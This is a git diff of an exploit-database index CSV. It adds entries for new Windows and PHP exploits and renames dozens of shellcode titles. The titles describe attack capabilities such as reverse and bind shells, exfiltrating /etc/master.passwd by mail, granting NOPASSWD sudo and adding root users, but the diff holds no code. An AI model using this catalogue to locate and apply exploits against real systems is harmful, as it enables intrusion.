diff --git a/files.csv b/files.csv index db63f4b47..c9c4f9655 100644 --- a/files.csv +++ b/files.csv @@ -9201,12 +9201,16 @@ id,file,description,date,author,platform,type,port 42425,platforms/windows/local/42425.txt,"VirtualBox 5.1.22 - Windows Process DLL Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",windows,local,0 42426,platforms/windows/local/42426.txt,"VirtualBox 5.1.22 - Windows Process DLL UNC Path Signature Bypass Privilege Escalation",2017-08-03,"Google Security Research",windows,local,0 42429,platforms/windows/local/42429.py,"Microsoft Windows - '.LNK' Shortcut File Code Execution",2017-08-06,nixawk,windows,local,0 -42432,platforms/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,windows,local,0 +42432,platforms/windows/local/42432.cpp,"Microsoft Windows 7 SP1 x86 - GDI Palette Objects Local Privilege Escalation (MS17-017)",2017-07-19,Saif,windows,local,0 42435,platforms/win_x86-64/local/42435.txt,"Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) (2)",2017-08-08,SensePost,win_x86-64,local,0 42454,platforms/macos/local/42454.txt,"Xamarin Studio for Mac 6.2.1 (build 3) / 6.3 (build 863) - Privilege Escalation",2017-08-14,Securify,macos,local,0 42455,platforms/windows/local/42455.py,"ALLPlayer 7.4 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0 42456,platforms/windows/local/42456.py,"Internet Download Manager 6.28 Build 17 - Buffer Overflow (SEH Unicode)",2017-08-15,f3ci,windows,local,0 42521,platforms/windows/local/42521.py,"Easy DVD Creater 2.5.11 - Buffer Overflow (SEH)",2017-08-19,"Anurag Srivastava",windows,local,0 +42536,platforms/windows/local/42536.py,"Disk Pulse Enterprise 9.9.16 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0 +42538,platforms/windows/local/42538.py,"Disk Savvy Enterprise 9.9.14 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0 +42539,platforms/windows/local/42539.py,"VX Search Enterprise 9.9.12 - 'Import Command' Buffer Overflow",2017-08-22,"Anurag Srivastava",windows,local,0 +42540,platforms/windows/local/42540.rb,"Microsoft Windows - Escalate UAC Protection Bypass (Via COM Handler Hijack) (Metasploit)",2017-08-22,Metasploit,windows,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -15763,110 +15767,111 @@ id,file,description,date,author,platform,type,port 42370,platforms/unix/remote/42370.rb,"VICIdial 2.9 RC 1 to 2.13 RC1 - user_authorization Unauthenticated Command Execution (Metasploit)",2017-07-24,Metasploit,unix,remote,0 42395,platforms/windows/remote/42395.py,"DiskBoss Enterprise 8.2.14 - Buffer Overflow",2017-07-30,"Ahmad Mahfouz",windows,remote,0 42484,platforms/windows/remote/42484.html,"Mozilla Firefox < 45.0 - 'nsHtml5TreeBuilder' Use-After-Free (EMET 5.52 Bypass)",2017-08-18,"Hans Jerry Illikainen",windows,remote,0 +42541,platforms/php/remote/42541.rb,"IBM OpenAdmin Tool - SOAP welcomeServer PHP Code Execution (Metasploit)",2017-08-22,Metasploit,php,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 -13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 +13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 13243,platforms/bsd_ppc/shellcode/13243.c,"BSD/PPC - execve /bin/sh Shellcode (128 bytes)",2004-09-26,Palante,bsd_ppc,shellcode,0 -13244,platforms/bsd_x86/shellcode/13244.c,"BSD/x86 - setuid(0) then execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0 -13245,platforms/bsd_x86/shellcode/13245.c,"BSD/x86 - Bind Shell 31337/TCP + setuid(0) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0 -13246,platforms/bsd_x86/shellcode/13246.c,"BSD/x86 - execve /bin/sh multiplatform Shellcode (27 bytes)",2004-09-26,n0gada,bsd_x86,shellcode,0 -13247,platforms/bsd_x86/shellcode/13247.c,"BSD/x86 - execve /bin/sh setuid (0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 -13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - Bind Shell 31337/TCP Shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0 -13249,platforms/bsd_x86/shellcode/13249.c,"BSD/x86 - Bind Random Port Shellcode (143 bytes)",2004-09-26,MayheM,bsd_x86,shellcode,0 +13244,platforms/bsd_x86/shellcode/13244.c,"BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0 +13245,platforms/bsd_x86/shellcode/13245.c,"BSD/x86 - Bind TCP Shell (31337/TCP) + setuid(0) Shellcode (94 bytes)",2006-07-20,"Marco Ivaldi",bsd_x86,shellcode,0 +13246,platforms/bsd_x86/shellcode/13246.c,"BSD/x86 - execve /bin/sh Shellcode (27 bytes)",2004-09-26,n0gada,bsd_x86,shellcode,0 +13247,platforms/bsd_x86/shellcode/13247.c,"BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 +13248,platforms/bsd_x86/shellcode/13248.c,"BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes)",2004-09-26,no1,bsd_x86,shellcode,0 +13249,platforms/bsd_x86/shellcode/13249.c,"BSD/x86 - Bind TCP Shell (Random Port) Shellcode (143 bytes)",2004-09-26,MayheM,bsd_x86,shellcode,0 13250,platforms/bsd_x86/shellcode/13250.c,"BSD/x86 - Break chroot Shellcode (45 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 -13251,platforms/bsd_x86/shellcode/13251.c,"BSD/x86 - execve /bin/sh Crypt Shellcode (49 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0 -13252,platforms/bsd_x86/shellcode/13252.c,"BSD/x86 - execve /bin/sh ENCRYPT* Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 -13254,platforms/bsd_x86/shellcode/13254.c,"BSD/x86 - Connect torootteam.host.sk:2222 Shellcode (93 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0 -13255,platforms/bsd_x86/shellcode/13255.c,"BSD/x86 - cat /etc/master.passwd | mail [email] Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 +13251,platforms/bsd_x86/shellcode/13251.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0 +13252,platforms/bsd_x86/shellcode/13252.c,"BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 +13254,platforms/bsd_x86/shellcode/13254.c,"BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes)",2004-09-26,dev0id,bsd_x86,shellcode,0 +13255,platforms/bsd_x86/shellcode/13255.c,"BSD/x86 - execve /bin/cat /etc/master.passwd | mail [email] Shellcode (92 bytes)",2004-09-26,"Matias Sedalo",bsd_x86,shellcode,0 13256,platforms/bsd_x86/shellcode/13256.c,"BSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)",2004-09-26,"Sinan Eren",bsd_x86,shellcode,0 13257,platforms/bsdi_x86/shellcode/13257.txt,"BSDi/x86 - execve /bin/sh Shellcode (45 bytes)",2004-09-26,duke,bsdi_x86,shellcode,0 13258,platforms/bsdi_x86/shellcode/13258.txt,"BSDi/x86 - execve /bin/sh Shellcode (46 bytes)",2004-09-26,vade79,bsdi_x86,shellcode,0 -13260,platforms/bsdi_x86/shellcode/13260.c,"BSDi/x86 - execve /bin/sh toupper evasion Shellcode (97 bytes)",2004-09-26,anonymous,bsdi_x86,shellcode,0 -13261,platforms/freebsd/shellcode/13261.txt,"FreeBSD i386 & AMD64 - Execve /bin/sh Shellcode (Anti-Debugging) (140 bytes)",2009-04-13,c0d3_z3r0,freebsd,shellcode,0 +13260,platforms/bsdi_x86/shellcode/13260.c,"BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,bsdi_x86,shellcode,0 +13261,platforms/freebsd/shellcode/13261.txt,"FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,freebsd,shellcode,0 13262,platforms/freebsd_x86/shellcode/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,freebsd_x86,shellcode,0 -13263,platforms/freebsd_x86/shellcode/13263.txt,"FreeBSD/x86 - connect back.send.exit /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,freebsd_x86,shellcode,0 -13264,platforms/freebsd_x86/shellcode/13264.txt,"FreeBSD/x86 - kill all processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,freebsd_x86,shellcode,0 -13265,platforms/freebsd_x86/shellcode/13265.c,"FreeBSD/x86 - rev connect + recv + jmp + return results Shellcode (90 bytes)",2008-09-05,sm4x,freebsd_x86,shellcode,0 -13266,platforms/freebsd_x86/shellcode/13266.asm,"FreeBSD/x86 - /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,freebsd_x86,shellcode,0 -13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - Reverse /bin/sh Shell (127.0.0.1:8000) Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 -13268,platforms/freebsd_x86/shellcode/13268.asm,"FreeBSD/x86 - setuid(0); execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 -13269,platforms/freebsd_x86/shellcode/13269.c,"FreeBSD/x86 - /bin/sh Encrypted Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,freebsd_x86,shellcode,0 +13263,platforms/freebsd_x86/shellcode/13263.txt,"FreeBSD/x86 - Reverse TCP cat /etc/passwd (192.168.1.33:8000/TCP) Shellcode (112 bytes)",2008-09-10,suN8Hclf,freebsd_x86,shellcode,0 +13264,platforms/freebsd_x86/shellcode/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,freebsd_x86,shellcode,0 +13265,platforms/freebsd_x86/shellcode/13265.c,"FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + JMP + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,freebsd_x86,shellcode,0 +13266,platforms/freebsd_x86/shellcode/13266.asm,"FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,freebsd_x86,shellcode,0 +13267,platforms/freebsd_x86/shellcode/13267.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000) Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 +13268,platforms/freebsd_x86/shellcode/13268.asm,"FreeBSD/x86 - setuid(0); + execve(ipf -Fa); Shellcode (57 bytes)",2008-08-21,sm4x,freebsd_x86,shellcode,0 +13269,platforms/freebsd_x86/shellcode/13269.c,"FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,freebsd_x86,shellcode,0 13270,platforms/freebsd_x86/shellcode/13270.c,"FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes)",2006-07-19,MahDelin,freebsd_x86,shellcode,0 13271,platforms/freebsd_x86/shellcode/13271.c,"FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes)",2006-04-19,IZ,freebsd_x86,shellcode,0 13272,platforms/freebsd_x86/shellcode/13272.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2006-04-14,IZ,freebsd_x86,shellcode,0 -13273,platforms/freebsd_x86/shellcode/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (2) (23 bytes)",2004-09-26,marcetam,freebsd_x86,shellcode,0 +13273,platforms/freebsd_x86/shellcode/13273.c,"FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes)",2004-09-26,marcetam,freebsd_x86,shellcode,0 13274,platforms/freebsd_x86/shellcode/13274.c,"FreeBSD/x86 - execve /bin/sh Shellcode (37 bytes)",2004-09-26,preedator,freebsd_x86,shellcode,0 -13275,platforms/freebsd_x86/shellcode/13275.c,"FreeBSD/x86 - kldload /tmp/o.o Shellcode (74 bytes)",2004-09-26,dev0id,freebsd_x86,shellcode,0 +13275,platforms/freebsd_x86/shellcode/13275.c,"FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes)",2004-09-26,dev0id,freebsd_x86,shellcode,0 13276,platforms/freebsd_x86/shellcode/13276.c,"FreeBSD/x86 - chown 0:0 + chmod 6755 + execve /tmp/sh Shellcode (44 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0 13277,platforms/freebsd_x86/shellcode/13277.c,"FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes)",2004-09-26,"Claes Nyberg",freebsd_x86,shellcode,0 -13278,platforms/freebsd_x86/shellcode/13278.asm,"FreeBSD/x86 - Connect Port 31337 Shellcode (102 bytes)",2004-09-26,Scrippie,freebsd_x86,shellcode,0 +13278,platforms/freebsd_x86/shellcode/13278.asm,"FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (102 bytes)",2004-09-26,Scrippie,freebsd_x86,shellcode,0 13279,platforms/freebsd_x86-64/shellcode/13279.c,"FreeBSD/x86-64 - exec(_/bin/sh_) Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",freebsd_x86-64,shellcode,0 13280,platforms/freebsd_x86-64/shellcode/13280.c,"FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes)",2009-05-15,c0d3_z3r0,freebsd_x86-64,shellcode,0 13281,platforms/generator/shellcode/13281.c,"Linux/x86 - execve Null-Free Shellcode (Generator)",2009-06-29,certaindeath,generator,shellcode,0 -13282,platforms/generator/shellcode/13282.php,"Linux/x86 - Bind Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0 -13283,platforms/generator/shellcode/13283.php,"Windows XP SP1 - Bind Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0 -13284,platforms/generator/shellcode/13284.txt,"(Generator) - /bin/sh Polymorphic With Printable ASCII Characters Shellcode",2008-08-31,sorrow,generator,shellcode,0 -13285,platforms/generator/shellcode/13285.c,"Linux/x86 - cmd Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0 -13286,platforms/generator/shellcode/13286.c,"(Generator) - Alphanumeric Shellcode (Encoder/Decoder)",2008-08-04,"Avri Schneider",generator,shellcode,0 +13282,platforms/generator/shellcode/13282.php,"Linux/x86 - Bind TCP Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0 +13283,platforms/generator/shellcode/13283.php,"Windows XP SP1 - Bind TCP Shell Shellcode (Generator)",2009-06-09,"Jonathan Salwan",generator,shellcode,0 +13284,platforms/generator/shellcode/13284.txt,"Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator)",2008-08-31,sorrow,generator,shellcode,0 +13285,platforms/generator/shellcode/13285.c,"Linux/x86 - Command Null-Free Shellcode (Generator)",2008-08-19,BlackLight,generator,shellcode,0 +13286,platforms/generator/shellcode/13286.c,"Windows - Reverse TCP Shell (127.0.0.1:123/TCP) Alphanumeric Shellcode (Encoder/Decoder) (Generator)",2008-08-04,"Avri Schneider",generator,shellcode,0 13288,platforms/generator/shellcode/13288.c,"(Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes)",2006-10-22,izik,generator,shellcode,0 -13289,platforms/generator/shellcode/13289.c,"Win32 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode,0 -13290,platforms/ios/shellcode/13290.txt,"iOS - Version-independent Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0 -13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - Connectback 21/TCP Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 +13289,platforms/generator/shellcode/13289.c,"Windows x86 - Multi-Format Encoding Tool Shellcode (Generator)",2005-12-16,Skylined,generator,shellcode,0 +13290,platforms/ios/shellcode/13290.txt,"iOS Version-independent - Null-Free Shellcode",2008-08-21,"Andy Davis",ios,shellcode,0 +13291,platforms/hardware/shellcode/13291.txt,"Cisco IOS - New TTY / Privilege Level To 15 / Reverse Virtual Terminal Shell (21/TCP) Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13292,platforms/hardware/shellcode/13292.txt,"Cisco IOS/PowerPC - Bind Password (1rmp455) Shellcode (116 bytes)",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13293,platforms/hardware/shellcode/13293.txt,"Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode",2008-08-13,"Gyan Chawdhary",hardware,shellcode,0 13295,platforms/hp-ux/shellcode/13295.txt,"HPUX - execve /bin/sh Shellcode (58 bytes)",2004-09-26,K2,hp-ux,shellcode,0 -13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - Flush IPTables Rules Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0 -13297,platforms/lin_x86-64/shellcode/13297.c,"Linux/x86-64 - Reverse TCP Semi-Stealth Shell Shellcode (88+ bytes) (Generator)",2006-04-21,phar,lin_x86-64,shellcode,0 -13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind 4919/TCP Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 +13296,platforms/lin_x86-64/shellcode/13296.c,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes)",2008-11-28,gat3way,lin_x86-64,shellcode,0 +13297,platforms/generator/shellcode/13297.c,"Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator)",2006-04-21,phar,generator,shellcode,0 +13298,platforms/linux_mips/shellcode/13298.c,"Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 13299,platforms/linux_mips/shellcode/13299.c,"Linux/MIPS (Linksys WRT54G/GL) - execve Shellcode (60 bytes)",2008-08-18,vaicebine,linux_mips,shellcode,0 13300,platforms/linux_mips/shellcode/13300.c,"Linux/MIPS - execve /bin/sh Shellcode (56 bytes)",2005-11-09,"Charles Stevenson",linux_mips,shellcode,0 13301,platforms/linux_ppc/shellcode/13301.c,"Linux/PPC - execve /bin/sh Shellcode (60 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 13302,platforms/linux_ppc/shellcode/13302.c,"Linux/PPC - read + exec Shellcode (32 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 -13303,platforms/linux_ppc/shellcode/13303.c,"Linux/PPC - connect back (192.168.1.1:31337) execve /bin/sh Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 +13303,platforms/linux_ppc/shellcode/13303.c,"Linux/PPC - Reverse TCP /bin/sh Shell (192.168.1.1:31337/TCP) Shellcode (240 bytes)",2005-11-09,"Charles Stevenson",linux_ppc,shellcode,0 13304,platforms/linux_ppc/shellcode/13304.c,"Linux/PPC - execve /bin/sh Shellcode (112 bytes)",2004-09-12,Palante,linux_ppc,shellcode,0 13305,platforms/linux_sparc/shellcode/13305.c,"Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes)",2004-09-26,killah,linux_sparc,shellcode,0 -13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - Bind 8975/TCP Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0 +13306,platforms/linux_sparc/shellcode/13306.c,"Linux/SPARC - Bind TCP Shell (8975/TCP) Null-Free Shellcode (284 bytes)",2004-09-12,killah,linux_sparc,shellcode,0 13307,platforms/lin_x86/shellcode/13307.c,"Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 13308,platforms/lin_x86/shellcode/13308.c,"Linux/x86 - Forks a HTTP Server on 8800/TCP Shellcode (166 bytes)",2009-09-15,XenoMuta,lin_x86,shellcode,0 13309,platforms/lin_x86/shellcode/13309.asm,"Linux/x86 - Listens on 5555/TCP + Jumps to it Shellcode (83 bytes)",2009-09-09,XenoMuta,lin_x86,shellcode,0 13310,platforms/lin_x86/shellcode/13310.c,"Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes)",2009-08-26,"Jonathan Salwan",lin_x86,shellcode,0 -13311,platforms/lin_x86/shellcode/13311.c,"Linux/x86 - killall5 polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 -13312,platforms/lin_x86/shellcode/13312.c,"Linux/x86 - /bin/sh Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 -13313,platforms/lin_x86/shellcode/13313.c,"Linux/x86 - Bind 4444/TCP Shellcode (XOR Encoded) (152 bytes)",2009-07-10,Rick,lin_x86,shellcode,0 -13314,platforms/lin_x86/shellcode/13314.c,"Linux/x86 - reboot() polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",lin_x86,shellcode,0 -13315,platforms/lin_x86/shellcode/13315.c,"Linux/x86 - chmod(_/etc/shadow__666) Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0 -13316,platforms/lin_x86/shellcode/13316.c,"Linux/x86 - setreuid(geteuid()_geteuid())_execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode,0 -13317,platforms/lin_x86/shellcode/13317.s,"Linux/x86 - Bind 8000/TCP + Execve Iptables -F Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 -13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - Bind 8000/TCP + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 -13319,platforms/lin_x86/shellcode/13319.s,"Linux/x86 - Bind 8000/TCP ASM Code Linux Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",lin_x86,shellcode,0 +13311,platforms/lin_x86/shellcode/13311.c,"Linux/x86 - killall5 Polymorphic Shellcode (61 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 +13312,platforms/lin_x86/shellcode/13312.c,"Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes)",2009-08-11,"Jonathan Salwan",lin_x86,shellcode,0 +13313,platforms/lin_x86/shellcode/13313.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes)",2009-07-10,Rick,lin_x86,shellcode,0 +13314,platforms/lin_x86/shellcode/13314.c,"Linux/x86 - reboot() Polymorphic Shellcode (57 bytes)",2009-06-29,"Jonathan Salwan",lin_x86,shellcode,0 +13315,platforms/lin_x86/shellcode/13315.c,"Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0 +13316,platforms/lin_x86/shellcode/13316.c,"Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode,0 +13317,platforms/lin_x86/shellcode/13317.s,"Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 +13318,platforms/lin_x86/shellcode/13318.s,"Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes)",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 +13319,platforms/lin_x86/shellcode/13319.s,"Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes)",2009-06-01,"Jonathan Salwan",lin_x86,shellcode,0 13320,platforms/lin_x86-64/shellcode/13320.c,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes)",2009-05-14,evil.xi4oyu,lin_x86-64,shellcode,0 -13321,platforms/lin_x86/shellcode/13321.c,"Linux/x86 - Serial port shell binding + busybox Launching Shellcode (82 bytes)",2009-04-30,phar,lin_x86,shellcode,0 +13321,platforms/lin_x86/shellcode/13321.c,"Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes)",2009-04-30,phar,lin_x86,shellcode,0 13322,platforms/lin_x86/shellcode/13322.c,"Linux/x86 - File Unlinker Shellcode (18+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 13323,platforms/lin_x86/shellcode/13323.c,"Linux/x86 - Perl Script Execution Shellcode (99+ bytes)",2009-03-03,darkjoker,lin_x86,shellcode,0 13324,platforms/lin_x86/shellcode/13324.c,"Linux/x86 - File Reader Shellcode (65+ bytes)",2009-02-27,certaindeath,lin_x86,shellcode,0 -13325,platforms/lin_x86/shellcode/13325.c,"Linux/x86 - chmod(_/etc/shadow__666) + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0 +13325,platforms/lin_x86/shellcode/13325.c,"Linux/x86 - chmod 666 /etc/shadow + exit(0) Shellcode (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0 13326,platforms/lin_x86/shellcode/13326.c,"Linux/x86 - killall5 Shellcode (34 bytes)",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0 13327,platforms/lin_x86/shellcode/13327.c,"Linux/x86 - PUSH reboot() Shellcode (30 bytes)",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0 -13328,platforms/generator/shellcode/13328.c,"Linux/x86 - Shellcode Obfuscator (Generator)",2008-12-09,sm4x,generator,shellcode,0 +13328,platforms/generator/shellcode/13328.c,"Linux/x86 - Shellcode Obfuscator Null-Free (Generator)",2008-12-09,sm4x,generator,shellcode,0 13329,platforms/lin_x86/shellcode/13329.c,"Linux/x86 - Reverse UDP tcpdump (54321/UDP) Live Packet Capture Shellcode (151 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0 13330,platforms/lin_x86/shellcode/13330.c,"Linux/x86 - Append RSA key to /root/.ssh/authorized_keys2 Shellcode (295 bytes)",2008-11-23,XenoMuta,lin_x86,shellcode,0 13331,platforms/lin_x86/shellcode/13331.c,"Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) for full access Shellcode (86 bytes)",2008-11-19,Rick,lin_x86,shellcode,0 13332,platforms/lin_x86/shellcode/13332.c,"Linux/x86 - Ho' Detector - Promiscuous mode detector Shellcode (56 bytes)",2008-11-18,XenoMuta,lin_x86,shellcode,0 -13333,platforms/lin_x86/shellcode/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Shellcode (28 bytes)",2008-11-13,sch3m4,lin_x86,shellcode,0 -13334,platforms/lin_x86/shellcode/13334.txt,"Linux/x86 - setresuid(0_0_0) /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode,0 +13333,platforms/lin_x86/shellcode/13333.txt,"Linux/x86 - setuid(0) + execve(/bin/sh_0_0) Null-Free Shellcode (28 bytes)",2008-11-13,sch3m4,lin_x86,shellcode,0 +13334,platforms/lin_x86/shellcode/13334.txt,"Linux/x86 - setresuid(0_0_0) + /bin/sh Shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode,0 13335,platforms/lin_x86/shellcode/13335.c,"Linux/x86 - iopl(3); asm(cli); while(1){} Shellcode (12 bytes)",2008-09-17,dun,lin_x86,shellcode,0 13336,platforms/lin_x86/shellcode/13336.c,"Linux/x86 - system-beep Shellcode (45 bytes)",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0 13337,platforms/lin_x86/shellcode/13337.c,"Linux/x86 - ConnectBack (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0 13338,platforms/lin_x86/shellcode/13338.c,"Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes)",2008-08-19,Reth,lin_x86,shellcode,0 -13339,platforms/lin_x86/shellcode/13339.asm,"Linux/x86 - Reverse TCP /etc/shadow (8192/TCP) 